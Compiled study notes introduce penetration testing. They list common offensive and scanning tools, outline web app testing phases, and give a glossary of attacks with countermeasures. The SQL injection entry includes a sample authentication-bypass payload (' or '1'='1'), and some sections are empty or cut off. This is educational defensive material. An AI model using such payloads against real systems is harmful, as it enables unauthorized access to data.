Pen Testing Basics
Pen Testing Basics
Pen Testing Basics
http://todayhacking.com/hacking-guide-to-basic-security-penetration-testing-
and-everything-else-hacking/
https://www.cybrary.it/forums/topic/all-in-one-study-guide-for-pentesters-
and-forensics/
OverTheWire: Bandit
overthewire.org/wargames/bandit/
1
What is Penetration Testing?
Penetration testing is a type of security testing that is used to test the insecurity of an
application. It is conducted to find the security risk which might be present in the system.
If a system is not secured, then any attacker can disrupt or take authorized access to that
system. Security risk is normally an accidental error that occurs while developing and
implementing the software. For example, configuration errors, design errors, and software
bugs, etc.
Why is Penetration Testing Required?
Penetration testing normally evaluates a system’s ability to protect its networks,
applications, endpoints and users from external or internal threats. It also attempts to
protect the security controls and ensures only authorized access.
Penetration testing is essential because −
It identifies a simulation environment i.e., how an intruder may attack the system
through white hat attack.
It helps to find weak areas where an intruder can attack to gain access to the computer’s
features and data.
It supports to avoid black hat attack and protects the original data.
It estimates the magnitude of the attack on potential business.
It provides evidence to suggest, why it is important to increase investments in security
aspect of technology
When to Perform Penetration Testing?
Penetration testing is an essential feature that needs to be performed regularly for securing
the functioning of a system. In addition to this, it should be performed whenever −
Security system discovers new threats by attackers.
You add a new network infrastructure.
You update your system or install new software.
You relocate your office.
You set up a new end-user program/policy.
2
Customer Protection − Breach of even a single customer’s data may cause big financial
damage as well as reputation damage. It protects the organizations who deal with the
customers and keep their data intact.
Penetration testing is a combination of techniques that considers various issues of the systems
and tests, analyzes, and gives solutions. It is based on a structured procedure that performs
penetration testing step-by-step.
How is it Performed?
Step #1. It starts with a list of Vulnerabilities/potential problem areas that would cause a
security breach for the system.
Step #2. If possible, this list of items is ranked in the order of priority/criticality
Step #3. Devise penetration tests that would work (attack your system) from both within
the network and outside (externally) are done to determine if you can access
data/network/server/website unauthorized.
Step #4. If unauthorized access is possible, then the system has to be corrected and the
series of steps need to be re-run until the problem area is fixed.
Who Performs Pen-testing?
Testers/ Network specialists/ Security Consultants perform Pen-testing.
Note: It is important to note that pen-testing is not the same as vulnerability testing. The
intention of vulnerability testing is just to identify the potential problems, whereas pen-testing is
to attack those problems.
Good news is, you do not have to start the process by yourself – you have a number of tools
already available in the market. Wondering, why tools?
3
Even though you design the test on what to attack and how you can leverage, a lot of
tools that are available in the market to hit the problem areas and collect data quickly that
in turn would enable effective security analysis of the system.
Before we look into the details of the tools, what they do, where you can get them, etc. , I would
like to point out that the tools you use for pen-testing can be classified into two kinds – In simple
words, they are scanners and attackers. This is because; by definition, pen-testing is exploiting
the weak spots. So there are some software/tools that will show you the weak spots, & some that
show, and attack. Literally speaking, the ‘show-ers’ are not pen-testing tools but they are
inevitable for its success.
#1) Netsparker
Netsparker is a dead accurate automated scanner that will identify vulnerabilities such as SQL Injection
and Cross-site Scripting in web applications and web APIs. Netsparker uniquely verifies the identified
vulnerabilities proving they are real and not false positives.
Therefore you do not have to waste hours manually verifying the identified vulnerabilities once a scan is
finished.
It is available as a Windows software and an online service.
Download link: Click here to learn more about Netsparker
**************
#2) Acunetix
Acunetix is a fully automated web vulnerability scanner that detects and reports on over 4500 web
application vulnerabilities including all variants of SQL Injection and XSS.
It complements the role of a penetration tester by automating tasks that can take hours to test for
manually, delivering accurate results with no false positives at top speed.
Acunetix fully supports HTML5, JavaScript and Single-page applications as well as CMS systems. It
includes advanced manual tools for penetration testers and integrates with popular Issue Trackers and
WAFs.
Download link: Click here to learn more about Acunetix
#3) Metasploit
4
This is the most advanced and popular Framework that can be used to for pen-testing. It is based on the
concept of ‘exploit’ which is a code that can surpass the security measures and enter a certain system. If
entered, it runs a ‘payload’, a code that performs operations on a target machine, thus creating a perfect
framework for penetration testing.
It can be used on web applications, networks, servers etc. It has a command-line and the GUI clickable
interface works on Linux, Apple Mac OS X and Microsoft Windows. Although there might be few free
limited trials available, this is a commercial product.
Download link: Metasploit Download
**************
#4) Wireshark
This is basically a network protocol analyzer –popular for providing the minutest details about your
network protocols, packet information, decryption etc. It can be used on Windows, Linux, OS X, Solaris,
FreeBSD, NetBSD, and many other systems. The information that is retrieved via this tool can be
viewed through a GUI or the TTY-mode TShark utility. You can get your own free version of the tool
from the link below.
Download link: Wireshark download
**************
#5) w3af
5
#6) Kali Linux
Kali Linux is an open source project that is maintained by Offensive Security. Few prime features of Kali
Linux include Accessibility, Full Customisation of Kali ISOs, Live USB with Multiple Persistence
Stores, Full Disk Encryption, Running on Android, Disk Encryption on Raspberry Pi 2, etc.
Tools Listings, Metapackages and version Tracking are some of the Penetration Testing tools present in
Kali Linux. For more information and in order to download, visit the below page.
Download link: Kali Linux download
**************
#7) Nessus
Nessus is also a scanner and it needs to be watched out for. It is one of the most robust vulnerability
identifier tools available. It specializes in compliance checks, Sensitive data searches, IPs scan, website
scanning etc. and aids in finding the ‘weak-spots’.
It works best on most of the environments. For more information and in order to download, visit the
below page.
Download link: Nessus download
**************
#8) Burpsuite
Burp suite is also essentially a scanner (with a limited “intruder” tool for attacks), although many security
testing specialists swear that pen-testing without this tool is unimaginable. The tool is not free, but very
cost effective.
Take a look at it on the below download page. It mainly works wonders with intercepting proxy,
crawling content and functionality, web application scanning etc. You can use this on Windows, Mac
OS X and Linux environments.
Download link: Burp suite download
**************
6
#9) Cain & Abel
If cracking encrypted passwords or network keys is what you need, then Cain & Abel is the perfect tool
for you.
It uses network sniffing, Dictionary, Brute-Force & Cryptanalysis attacks, cache uncovering and routing
protocol analysis methods to achieve this. Check out information about this free to use a tool at the below
page. This is exclusively for Microsoft operating systems.
Download link: Cain & Abel download
**************
#10) Zed Attack Proxy (ZAP)
ZAP is completely free to use, scanner and security vulnerability finder for web applications. ZAP
includes Proxy intercepting aspects, a variety of scanners, spiders etc.
It works best on most platforms. For more information and in order to download visit the below page.
Download link: ZAP download
**************
#11) John The Ripper
7
Another password cracker in line is John the Ripper. This tool works on most of the environments,
although it’s primarily for UNIX systems. It is considered as one of the fastest tools in this genre.
Password hash code and strength-checking code are also made available to be integrated into your own
software/code which I think is very unique. This tool comes in a pro and free form. Check out its site to
obtain the software on this page.
Download link: John the Ripper download
#12) Retina
As opposed to a certain application or a server, Retina targets the entire environment at a particular
company/firm. It comes as a package called Retina Community.
It is a commercial product and is a sort of a vulnerability management tool more than a pen-testing tool. It
works on having scheduled assessments and presenting results. Check out more about this package at the
below page.
Download link: Retina download
#13) Sqlmap
Sqlmap is again a good open source pe-testing tool. This tool is mainly used for detecting and exploiting
SQL injection issues in an application and hacking over of database servers.
It comes with the command-line interface. Platform: Linux, Apple Mac OS X and Microsoft Windows
are its supported platforms. All versions of this tool are free for download. Check out the below page for
details.
Download link: Sqlmap download
#14) Canvas
8
Immunity’s CANVAS is a widely used tool that contains more than 400 exploits and multiple payload
options. It renders useful for web applications, wireless systems, networks etc.
It has a command-line and GUI interface, works best on Linux, Apple Mac OS X and Microsoft
Windows. It is not free of charge and more information can be found at the below page.
Download link: Canvas download
#15) Social Engineer Toolkit
The Social-Engineer Toolkit (SET) is a unique tool in terms that the attacks are targeted at the human
element than on the system element. It has features that let you send emails, java applets, etc containing
the attack code. It goes without saying that this tool is to be used very carefully and only for ‘white-hat’
reasons.
It has a command-line interface, works on Linux, Apple Mac OS X and Microsoft Windows. It is open
source and can be found at below page.
Download link: SET download
#16) Sqlninja
Sqlninja, as the name, indicates it is all about taking over the DB server using SQL injection in any
environment. This product by itself claims not to be so stable. Its popularity indicates how robust it is
already with the DB related vulnerability exploitation.
It has a command-line interface, works best on Linux, Apple Mac OS X and not on Microsoft Windows.
It is an open source and can be found at the below page.
Download link: Sqlninja download
#17) Nmap
9
“Network Mapper” though not necessarily a pen-testing tool, it is a must-have tool for ethical hackers.
This is a very popular hacking tool that predominantly aids in understanding the characteristics of any
target network.
The characteristics include host, services, OS, packet filters/firewalls etc. It works on most of the
environments and is open sourced.
Download link: Nmap download
#18) BeEF
BeEF stands for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the
web browser which means, it takes advantage of the fact that an open web-browser is the window(or
crack) into a target system and designs its attacks to go on from this point.
It has a GUI interface, works on Linux, Apple Mac OS X and Microsoft Windows. It is an open source
and can be found at the below page.
Download link: BeEF download
#19) Dradis
Dradis is an open source framework (a web application) that helps with maintaining the information that
can be shared among the participants of a pen-test. The information collected helps to understand what is
done and what needs to be done.
It achieves this purpose by the means of plugins to read and collect data from network scanning tools like
Nmap, w3af, Nessus, Burp Suite, Nikto and much more. It has a GUI interface, works on Linux, Apple
Mac OS X and Microsoft Windows. It is an open source and can be found at the below page.
Download link: Dradis download
10
**************
Additional Tools for Security and Pen-Testing
The above given is a huge list of penetration tools but that is not the end. There are few more tools and software
that are gaining momentum in recent times.
Here are these:
20) Ettercap: A network and host analysis tool that provides sniffing and protocol dissection
among other things. More info here.
21) Veracode: Works with the code development process to ensure security and minimize the
vulnerabilities at the source level. Check here.
22) Aircrack-ng: Captures data packets and uses the same for recovery of 802.11 WEP and
WPA-PSK keys. Download here.
23) Arachni: This is a Ruby framework that helps in analyzing web application security. It
performs a meta-analysis on the HTTP responses it receives during an audit process and presents
various insights into how secure the application is. Download here.
24) IBM AppScan: As the name itself indicates, this is a scanner that identifies problem areas and
suggests remedial actions. Download here.
25) Nagios: This Software when used will monitor the entire environment including servers,
applications, network – the entire infrastructure and alert when a potential problem is
detected. Download here.
26) WebScarabNG: This tool uses the HTTP/https requests between the browser and the server
to understand, capture and sometimes modify the parameters that are part of the communication
between the two parties. Download here.
27) Maltego: This is a unique tool that focuses on showing/highlighting the relationships between
people, sites, infrastructure etc. in order to identify inconsistent/incorrect connections. Download
here.
28) IronWASP: It is a customizable scanner creator for web applications using python/ruby
scripting. Download here.
29) HconSTF: Using this tool you can create your own web exploits, decoys that you can use to
exploit vulnerabilities in the areas of passwords, databases, network etc. Download here.
30) OpenVAS: Stands for Open Vulnerabilities Assessment System. Well, the name says it all. For
more info, check here.
31) Secunia PSI: It is a personal software inspector that will keep your system secure when
installed. Try it here.
11
We hope this piques your interest in the pen-testing field and provides you with the necessary
information to get started. A word of caution: remember to wear your ‘White-hat’ because with
great power comes great responsibility- and we don’t want to be the ones to misuse it. :-)
12
Vulnerability Scanning or Pen Testing?
Vulnerability Scanning lets the user find out the known weaknesses in the application and
defines methods to fix and improve the overall security of the application. It basically finds
out if security patches are installed, whether the systems are properly configured to make
attacks difficult.
Pen Tests mainly simulates real-time systems and helps the user find out if the system can be
accessed by unauthorized users, if yes then what damage can be caused and to which data etc.
Hence, Vulnerability Scanning is a detective control method which suggests for ways to
improve security program and ensure known weaknesses do not resurface whereas pen test is
a preventive control method which gives an overall view of the system’s existing security
layer.
Though, both the methods have its importance, but it will depend on what really is expected
as part of the testing.
As testers, it is imperative to be clear on the purpose of the testing before we jump into
testing. If you are clear on the objective, you can very well define if you need to do a
vulnerability scan or pen testing.
If you look at the current market demand, there has been a sharp increase in the mobile usage, which
is becoming a major potential for attacks. Accessing websites through mobiles are prone to more
frequent attacks and hence compromising of data.
Penetration Testing thus becomes very important in ensuring we build a secure system which can be
used by users without any worries of hacking or data loss.
13
Test Scenarios:
Listed below are some of the test scenarios which can be tested as part of Web Application
Penetration Testing (WAPT):
1. Cross Site Scripting
2. SQL Injection
3. Broken authentication and session management
4. File Upload flaws
5. Caching Servers Attacks
6. Security Misconfigurations
7. Cross Site Request Forgery
8. Password Cracking
Even though I have mentioned the list, testers should not blindly create their test methodology based
on above conventional standards.
The answer is a No because eCommerce works on a very different platform and technology when
compared to other Websites. In order to make your pen testing for eCommerce website effective,
testers should design a methodology involving flaws like Order Management, Coupon and Reward
Management, Payment Gateway Integration and Content Management System Integration.
So, before you decide on the methodology, be very sure on what types of website are expected to be
tested and which method will help in finding the maximum vulnerabilities.
This helps in finding out if there could be vulnerabilities which exist within the corporate firewall.
We always believe attacks can happen only externally and many a time’s internal Pentest is
overlooked or not given much importance.
14
Testing is mainly done by accessing the environment without proper credentials and identifying if an
Testers behave like hackers who aren’t much aware of the internal system.
To simulate such attacks, testers are given the IP of the target system and not provided any other
information. They are required to search and scan public web pages and find our information about
target hosts and then compromise the found hosts.
Scope definition – This is same like our functional testing where we define the scope of our
testing before starting our test efforts.
Availability of Documentation to Testers – Ensure Testers have all the required documents
like documents detailing the web architecture, integration points, web services integration
etc. The tester should be aware of the HTTP/HTTPS protocol basics and know about the Web
Application Architecture, traffic interception ways.
Determining the Success Criteria – Unlike our functional test cases, where we can derive
expected results from user requirements/functional requirements, pen testing works on a
different model. The Success criteria or the test case passing criteria needs to be defined and
approved.
Reviewing the test results from the Previous Testing – If prior testing was ever done, it is
good to review the test results to understand what vulnerabilities existed in the past and what
remediation was taken to resolve. This always gives a better picture to the testers.
15
Understanding environment – Testers should gain knowledge about the environment before
starting testing. This step should ensure to give them an understanding on firewalls, or other
security protocols which would be required to be disabled to perform the testing. Browser to
be tested should be converted into an attack platform, usually done by changing proxies.
Ensure to run a test with different user roles – Testers should ensure to run tests with
users having different roles since the system may behave differently with respect to users
having different privilege.
Awareness on how to handle Post-Exploitation – Testers must follow the Success Criteria
defined as part of Phase 1 to report any exploitation, also they should follow the defined
process of reporting vulnerabilities found during testing. This step mainly involves the tester
to find out what needs to be done after they have found that the system has been
compromised.
Generation of Test Reports – Any Testing done without proper reporting doesn’t help
organization much, same is the case with penetration testing of web applications. To ensure
the test results are properly shared with all stakeholders, testers should create proper reports
with details on vulnerabilities found, the methodology used for testing, severity and the
location of the problem found.
16
#3) Post Execution Phase (After Testing):
Once the testing is complete and test reports shared with all concerned teams, the following list
should be worked upon by all –
Suggest remediation – Pen Testing shouldn’t just end by identifying vulnerabilities. The
concerned team including a QA member should review the findings reported by Testers and
then discuss the remediation.
Retest Vulnerabilities – After the remediation is taken and implemented, testers should
retest to ensure that the fixed vulnerabilities did not appear as part of their retesting.
Cleanup – As part of the Pentest, testers make changes to the proxy settings, so clean up
should be done and all changes reverted back.
17
PENETRATION TESTING STAGES
The pen testing process can be broken down into five stages.
18
The results of the penetration test are then compiled into a report detailing:
o Specific vulnerabilities that were exploited
o Sensitive data that was accessed
o The amount of time the pen tester was able to remain in the system undetected
This information is analyzed by security personnel to help configure an enterprise’s WAF
settings and other application security solutions to patch vulnerabilities and protect
against future attacks.
19
THREAT GLOSSARY
A cyber attack is any type of offensive action that targets computer information systems,
infrastructures, computer networks or personal computer devices, using various methods to steal,
alter or destroy data or information systems.
20
TCP SYN flood attack
In this attack, an attacker exploits the use of the buffer space during a Transmission
Control Protocol (TCP) session initialization handshake. The attacker’s device floods the
target system’s small in-process queue with connection requests, but it does not respond
when the target system replies to those requests. This causes the target system to time out
while waiting for the response from the attacker’s device, which makes the system crash
or become unusable when the connection queue fills up.
There are a few countermeasures to a TCP SYN flood attack:
Place servers behind a firewall configured to stop inbound SYN packets.
Increase the size of the connection queue and decrease the timeout on open connections.
Teardrop attack
This attack causes the length and fragmentation offset fields in sequential Internet
Protocol (IP) packets to overlap one another on the attacked host; the attacked system
attempts to reconstruct packets during the process but fails. The target system then
becomes confused and crashes.
If users don’t have patches to protect against this DoS attack, disable SMBv2 and block
ports 139 and 445.
Smurf attack
This attack involves using IP spoofing and the ICMP to saturate a target network with
traffic. This attack method uses ICMP echo requests targeted at broadcast IP addresses.
These ICMP requests originate from a spoofed “victim” address. For instance, if the
intended victim address is 10.0.0.10, the attacker would spoof an ICMP echo request
from 10.0.0.10 to the broadcast address 10.255.255.255. This request would go to all IPs
in the range, with all the responses going back to 10.0.0.10, overwhelming the network.
This process is repeatable, and can be automated to generate huge amounts of network
congestion.
To protect your devices from this attack, you need to disable IP-directed broadcasts at the
routers. This will prevent the ICMP echo broadcast request at the network devices.
Another option would be to configure the end systems to keep them from responding to
ICMP packets from broadcast addresses.
Ping of death attack
This type of attack uses IP packets to ‘ping a target system with an IP size over the
maximum of 65,535 bytes. IP packets of this size are not allowed, so attacker fragments
the IP packet. Once the target system reassembles the packet, it can experience buffer
overflows and other crashes.
Ping of death attacks can be blocked by using a firewall that will check fragmented IP
packets for maximum size.
21
Botnets
Botnets are the millions of systems infected with malware under hacker control in order
to carry out DDoS attacks. These bots or zombie systems are used to carry out attacks
against the target systems, often overwhelming the target system’s bandwidth and
processing capabilities. These DDoS attacks are difficult to trace because botnets are
located in differing geographic locations.
Botnets can be mitigated by:
RFC3704 filtering, which will deny traffic from spoofed addresses and help ensure that
traffic is traceable to its correct source network. For example, RFC3704 filtering will
drop packets from bogon list addresses.
Black hole filtering, which drops undesirable traffic before it enters a protected network.
When a DDoS attack is detected, the BGP (Border Gateway Protocol) host should send
routing updates to ISP routers so that they route all traffic heading to victim servers to a
null0 interface at the next hop.
2. Man-in-the-middle (MitM) attack
A MitM attack occurs when a hacker inserts itself between the communications of a
client and a server. Here are some common types of man-in-the-middle attacks:
Session hijacking
In this type of MitM attack, an attacker hijacks a session between a trusted client and
network server. The attacking computer substitutes its IP address for the trusted client
while the server continues the session, believing it is communicating with the client. For
instance, the attack might unfold like this:
1. A client connects to a server.
2. The attacker’s computer gains control of the client.
3. The attacker’s computer disconnects the client from the server.
4. The attacker’s computer replaces the client’s IP address with its own IP address and
spoofs the client’s sequence numbers.
5. The attacker’s computer continues dialog with the server and the server believes it is still
communicating with the client.
22
IP Spoofing
IP spoofing is used by an attacker to convince a system that it is communicating with a
known, trusted entity and provide the attacker with access to the system. The attacker
sends a packet with the IP source address of a known, trusted host instead of its own IP
source address to a target host. The target host might accept the packet and act upon it.
23
Replay
A replay attack occurs when an attacker intercepts and saves old messages and then tries
to send them later, impersonating one of the participants. This type can be easily
countered with session timestamps or nonce (a random number or a string that changes
with time).
Currently, there is no single technology or configuration to prevent all MitM attacks.
Generally, encryption and digital certificates provide an effective safeguard against MitM
attacks, assuring both the confidentiality and integrity of communications. But a man-in-
the-middle attack can be injected into the middle of communications in such a way that
encryption will not help — for example, attacker “A” intercepts public key of person “P”
and substitute it with his own public key. Then, anyone wanting to send an encrypted
message to P using P’s public key is unknowingly using A’s public key. Therefore, A can
read the message intended for P and then send the message to P, encrypted in P’s real
public key, and P will never notice that the message was compromised. In addition, A
could also modify the message before resending it to P. As you can see, P is using
encryption and thinks that his information is protected but it is not, because of the MitM
attack.
So, how can you make sure that P’s public key belongs to P and not to A? Certificate
authorities and hash functions were created to solve this problem. When person 2 (P2)
wants to send a message to P, and P wants to be sure that A will not read or modify the
message and that the message actually came from P2, the following method must be
used:
1. P2 creates a symmetric key and encrypts it with P’s public key.
2. P2 sends the encrypted symmetric key to P.
3. P2 computes a hash function of the message and digitally signs it.
4. P2 encrypts his message and the message’s signed hash using the symmetric key and
sends the entire thing to P.
5. P is able to receive the symmetric key from P2 because only he has the private key to
decrypt the encryption.
6. P, and only P, can decrypt the symmetrically encrypted message and signed hash because
he has the symmetric key.
7. He is able to verify that the message has not been altered because he can compute the
hash of received message and compare it with digitally signed one.
8. P is also able to prove to himself that P2 was the sender because only P2 can sign the
hash so that it is verified with P2 public key.
3. Phishing and spear phishing attacks
24
Phishing attack is the practice of sending emails that appear to be from trusted sources
with the goal of gaining personal information or influencing users to do something. It
combines social engineering and technical trickery. It could involve an attachment to an
email that loads malware onto your computer. It could also be a link to an illegitimate
website that can trick you into downloading malware or handing over your personal
information.
Spear phishing is a very targeted type of phishing activity. Attackers take the time to
conduct research into targets and create messages that are personal and relevant. Because
of this, spear phishing can be very hard to identify and even harder to defend against. One
of the simplest ways that a hacker can conduct a spear phishing attack is email spoofing,
which is when the information in the “From” section of the email is falsified, making it
appear as if it is coming from someone you know, such as your management or your
partner company. Another technique that scammers use to add credibility to their story is
website cloning — they copy legitimate websites to fool you into entering personally
identifiable information (PII) or login credentials.
To reduce the risk of being phished, you can use these techniques:
Critical thinking — Do not accept that an email is the real deal just because you’re busy
or stressed or you have 150 other unread messages in your inbox. Stop for a minute and
analyze the email.
Hovering over the links — Move your mouse over the link, but do not click it! Just let
your mouse cursor h over over the link and see where would actually take you. Apply
critical thinking to decipher the URL.
Analyzing email headers — Email headers define how an email got to your address.
The “Reply-to” and “Return-Path” parameters should lead to the same domain as is stated
in the email.
Sandboxing — You can test email content in a sandbox environment, logging activity
from opening the attachment or clicking the links inside the email.
4. Drive-by attack
Drive-by download attacks are a common method of spreading malware. Hackers look
for insecure websites and plant a malicious script into HTTP or PHP code on one of the
pages. This script might install malware directly onto the computer of someone who
visits the site, or it might re-direct the victim to a site controlled by the hackers. Drive-by
downloads can happen when visiting a website or viewing an email message or a pop-up
window.
Unlike many other types of cyber security attacks, a drive-by doesn’t rely on a user to do
anything to actively enable the attack — you don’t have to click a download button or
open a malicious email attachment to become infected. A drive-by download can take
advantage of an app, operating system or web browser that contains security flaws due to
unsuccessful updates or lack of updates.
25
To protect yourself from drive-by attacks, you need to keep your browsers and operating
systems up to date and avoid websites that might contain malicious code. Stick to the
sites you normally use — although keep in mind that even these sites can be hacked.
Don’t keep too many unnecessary programs and apps on your device. The more plug-ins
you have, the more vulnerabilities there are that can be exploited by drive-by attacks.
5. Password attack
Because passwords are the most commonly used mechanism to authenticate users to an
information system, obtaining passwords is a common and effective attack approach.
Access to a person’s password can be obtained by looking around the person’s desk,
‘‘sniffing’’ the connection to the network to acquire unencrypted passwords, using social
engineering, gaining access to a password database or outright guessing. The last
approach can be done in either a random or systematic manner:
Brute-force password guessing means using a random approach by trying different
passwords and hoping that one work Some logic can be applied by trying passwords
related to the person’s name, job title, hobbies or similar items.
In a dictionary attack, a dictionary of common passwords is used to attempt to gain
access to a user’s computer and network. One approach is to copy an encrypted file that
contains the passwords, apply the same encryption to a dictionary of commonly used
passwords, and compare the results.
In order to protect yourself from dictionary or brute-force attacks, you need to implement
an account lockout policy that will lock the account after a few invalid password
attempts. You can follow these account lockout best practices in order to set it up
correctly.
Handpicked related content:
Password Policy Best Practices
6. SQL injection attack
SQL injection has become a common issue with database-driven websites. It occurs when
a malefactor executes a SQL query to the database via the input data from the client to
server. SQL commands are inserted into data-plane input (for example, instead of the
login or password) in order to run predefined SQL commands. A successful SQL
injection exploit can read sensitive data from the database, modify (insert, update or
delete) database data, execute administration operations (such as shutdown) on the
database, recover the content of a given file, and, in some cases, issue commands to the
operating system.
For example, a web form on a website might request a user’s account name and then send
it to the database in order to pull up the associated account information using dynamic
SQL like this:
“SELECT * FROM users WHERE account = ‘“ + userProvidedAccountNumber +”’;”
26
While this works for users who are properly entering their account number, it leaves a
hole for attackers. For example, if someone decided to provide an account number of “‘
or ‘1’ = ‘1’”, that would result in a query string of:
“SELECT * FROM users WHERE account = ‘’ or ‘1’ = ‘1’;”
Because ‘1’ = ‘1’ always evaluates to TRUE, the database will return the data for all
users instead of just a single user.
The vulnerability to this type of cyber security attack depends on the fact that SQL makes
no real distinction between the control and data planes. Therefore, SQL injections work
mostly if a website uses dynamic SQL. Additionally, SQL injection is very common with
PHP and ASP applications due to the prevalence of older functional interfaces. J2EE and
ASP.NET applications are less likely to have easily exploited SQL injections because of
the nature of the programmatic interfaces available.
In order to protect yourself from a SQL injection attacks, apply least0privilege model of
permissions in your databases. Stick to stored procedures (make sure that these
procedures don’t include any dynamic SQL) and prepared statements (parameterized
queries). The code that is executed against the database must be strong enough to prevent
injection attacks. In addition, validate input data against a white list at the application
level.
7. Cross-site scripting (XSS) attack
XSS attacks use third-party web resources to run scripts in the victim’s web browser or
scriptable application. Specifically, the attacker injects a payload with malicious
JavaScript into a website’s database. When the victim requests a page from the website,
the website transmits the page, with the attacker’s payload as part of the HTML body, to
the victim’s browser, which executes the malicious script. For example, it might send the
victim’s cookie to the attacker’s server, and the attacker can extract it and use it for
session hijacking. The most dangerous consequences occur when XSS is used to exploit
additional vulnerabilities. These vulnerabilities can enable an attacker to not only steal
cookies, but also log key strokes, capture screenshots, discover and collect network
information, and remotely access and control the victim’s machine.
27
While XSS can be taken advantage of within VBScript, ActiveX and Flash, the most widely
abused is JavaScript — primarily because JavaScript is supported widely on the web.
To defend against XSS attacks, developers can sanitize data input by users in an HTTP request
before reflecting it back. Make sure all data is validated, filtered or escaped before echoing
anything back to the user, such as the values of query parameters during searches. Convert
special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded
equivalents. Give users the option to disable client-side scripts.
8. Eavesdropping attack
Eavesdropping attacks occur through the interception of network traffic. By eavesdropping, an
attacker can obtain passwords, credit card numbers and other confidential information that a user
might be sending over the network. Eavesdropping can be passive or active:
Passive eavesdropping — A hacker detects the information by listening to the message
transmission in the network.
Active eavesdropping — A hacker actively grabs the information by disguising himself
as friendly unit and by sending queries to transmitters. This is called probing, scanning or
tampering.
Detecting passive eavesdropping attacks is often more important than spotting active ones, since
active attacks requires the attacker to gain knowledge of the friendly units by conducting passive
eavesdropping before.
Data encryption is the best countermeasure for eavesdropping.
28
9. Birthday attack
Birthday attacks are made against hash algorithms that are used to verify the integrity of a
message, software or digital signature. A message processed by a hash function produces
a message digest (MD) of fixed length, independent of the length of the input message;
this MD uniquely characterizes the message. The birthday attack refers to the probability
of finding two random messages that generate the same MD when processed by a hash
function. If an attacker calculates same MD for his message as the user has, he can safely
replace the user’s message with his, and the receiver will not be able to detect the
replacement even if he compares MDs.
10. Malware attack
Malicious software can be described as unwanted software that is installed in your system
without your consent. It can attach itself to legitimate code and propagate; it can lurk in
useful applications or replicate itself across the Internet. Here are some of the most
common types of malware:
Macro viruses —
These viruses infect applications such as Microsoft Word or Excel. Macro viruses attach
to an application’s initialization sequence. When the application is opened, the virus
executes instructions before transferring control to the application. The virus replicates
itself and attaches to other code in the computer system.
File infectors —
File infector viruses usually attach themselves to executable code, such as .exe files. The
virus is installed when the code is loaded. Another version of a file infector associates
itself with a file by creating a virus file with the same name, but an .exe extension.
Therefore, when the file is opened, the virus code will execute.
System or boot-record infectors —
A boot-record virus attaches to the master boot record on hard disks. When the system is
started, it will look at the boot sector and load the virus into memory, where it can
propagate to other disks and computers.
Polymorphic viruses —
These viruses conceal themselves through varying cycles of encryption and decryption.
The encrypted virus and an associated mutation engine are initially decrypted by a
decryption program. The virus proceeds to infect an area of code. The mutation engine
then develops a new decryption routine and the virus encrypts the mutation engine and a
copy of the virus with an algorithm corresponding to the new decryption routine. The
encrypted package of mutation engine and virus is attached to new code, and the process
repeats. Such viruses are difficult to detect but have a high level of entropy because of the
29
many modifications of their source code. Anti-virus software or free tools like Process
Hacker can use this feature to detect them.
Stealth viruses —
Stealth viruses take over system functions to conceal themselves. They do this by
compromising malware detection software so that the software will report an infected
area as being uninfected. These viruses conceal any increase in the size of an infected file
or changes to the file’s date and time of last modification.
Trojans —
A Trojan or a Trojan horse is a program that hides in a useful program and usually has a
malicious function. A major difference between viruses and Trojans is that Trojans do not
self-replicate. In addition to launching attacks on a system, a Trojan can establish a back
door that can be exploited by attackers. For example, a Trojan can be programmed to
open a high-numbered port so the hacker can use it to listen and then perform an attack.
Logic bombs —
A logic bomb is a type of malicious software that is appended to an application and is
triggered by a specific occurrence, such as a logical condition or a specific date and time.
Worms —
Worms differ from viruses in that they do not attach to a host file, but are self-contained
programs that propagate across networks and computers. Worms are commonly spread
through email attachments; opening the attachment activates the worm program. A
typical worm exploit involves the worm sending a copy of itself to every contact in an
infected computer’s email address In addition to conducting malicious activities, a worm
spreading across the internet and overloading email servers can result in denial-of-service
attacks against nodes on the network.
Droppers —
A dropper is a program used to install viruses on computers. In many instances, the
dropper is not infected with malicious code and, therefore might not be detected by virus-
scanning software. A dropper can also connect to the internet and download updates to
virus software that is resident on a compromised system.
Ransomware —
Ransomware is a type of malware that blocks access to the victim’s data and threatens to
publish or delete it unless a ransom is paid. While some simple computer ransomware
can lock the system in a way that is not difficult for a knowledgeable person to reverse,
more advanced malware uses a technique called cryptoviral extortion, which encrypts the
victim’s files in a way that makes them nearly impossible to recover without the
decryption key.
30
Handpicked related content:
How to Prevent Ransomware Best Practices
Ransomware Protection Using FSRM and PowerShell
Ransomware Survivor: 6 Tips to Prevent Ransomware Attacks
Adware —
Adware is a software application used by companies for marketing purposes; advertising
banners are displayed while any program is running. Adware can be automatically
downloaded to your system while browsing any website and can be viewed through pop-
up windows or through a bar that appears on the computer screen automatically.
Spyware —
Spyware is a type of program that is installed to collect information about users, their
computers or their browsing habits. It tracks everything you do without your knowledge
and sends the data to a remote user. It also can download and install other malicious
programs from the internet. Spyware works like adware but is usually a separate program
that is installed unknowingly when you install another freeware application.
BACKDOOR ATTACKS-
A backdoor is a malware type that negates normal authentication procedures to access a
system. As a result, remote access is granted to resources within an application, such as
databases and file servers, giving perpetrators the ability to remotely issue system
commands and update malware.
Backdoor installation is achieved by taking advantage of vulnerable components in a web
application. Once installed, detection is difficult as files tend to be highly obfuscated.
Webserver backdoors are used for a number of malicious activities, including:
o Data theft
o Website defacing
o Server hijacking
o The launching of distributed denial of service (DDoS) attacks
o Infecting website visitors (watering hole attacks)
o Advanced persistent threat (APT) assaults
CLICKJACKING-
Clickjacking is an attack that tricks a user into clicking a webpage element which is
invisible or disguised as another element. This can cause users to unwittingly download
malware, visit malicious web pages, provide credentials or sensitive information, transfer
money, or purchase products online.
Typically, clickjacking is performed by displaying an invisible page or HTML element,
inside an iframe, on top of the page the user sees. The user believes they are clicking the
31
visible page but in fact they are clicking an invisible element in the additional page
transposed on top of it.
The invisible page could be a malicious page, or a legitimate page the user did not intend
to visit – for example, a page on the user’s banking site that authorizes the transfer of
money.
There are several variations of the clickjacking attack, such as:
o Likejacking – a technique in which the Facebook “Like” button is manipulated,
causing users to “like” a page they actually did not intend to like.
o Cursorjacking – a UI redressing technique that changes the cursor for the position
the user perceives to another position. Cursorjacking relies on vulnerabilities in
Flash and the Firefox browser, which have now been fixed.
CROSS SITE REQUEST FORGERY (CSRF) ATTACK- WHAT IS CSRF
Cross site request forgery (CSRF), also known as XSRF, Sea Surf or Session Riding, is
an attack vector that tricks a web browser into executing an unwanted action in an
application to which a user is logged in.
